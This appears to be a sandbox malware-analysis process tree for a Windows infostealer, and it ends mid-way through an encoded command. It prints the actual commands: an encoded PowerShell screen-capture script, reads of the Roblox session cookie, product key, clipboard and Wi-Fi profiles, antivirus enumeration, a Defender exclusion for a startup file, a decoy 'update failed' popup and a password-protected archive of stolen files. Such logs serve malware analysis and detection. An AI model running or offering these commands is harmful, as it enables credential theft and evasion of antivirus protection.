        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        7⤵
        
        PID:4480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3148
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y31h4l4m\y31h4l4m.cmdline"
        9⤵
        
        PID:448
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES54E1.tmp" "c:\Users\Admin\AppData\Local\Temp\y31h4l4m\CSC170B80A5AFCF4BE7A7F1808F58CB6DD2.TMP"
        10⤵
        
        PID:2316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:3064
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:2528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:3268
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:4940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:900
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:4080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:4728
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:3608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:2468
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1644
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:1732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        7⤵
        
        PID:4596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        7⤵
        
        PID:4444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        
        PID:4900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        7⤵
        
        PID:1328
        
        C:\Windows\system32\getmac.exe
        
        getmac
        8⤵
        
        PID:3176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31402\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\TnsdI.zip" *"
        7⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\_MEI31402\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI31402\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\TnsdI.zip" *
        8⤵
        Executes dropped EXE
        
        PID:2852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        7⤵
        
        PID:1688
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        8⤵
        
        PID:2040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        7⤵
        
        PID:2968
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        8⤵
        
        PID:2056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:2528
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:448
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:3564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        7⤵
        
        PID:4724
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5108
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        7⤵
        
        PID:2976
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:3976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        7⤵
        
        PID:3832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        8⤵
        
        PID:4464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('windows update failed. hang on it will retry in a bit', 0, 'windows', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('windows update failed. hang on it will retry in a bit', 0, 'windows', 32+16);close()"
      4⤵
      PID:3208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2972
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2836
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4280
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2108
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3544
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:2784
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAA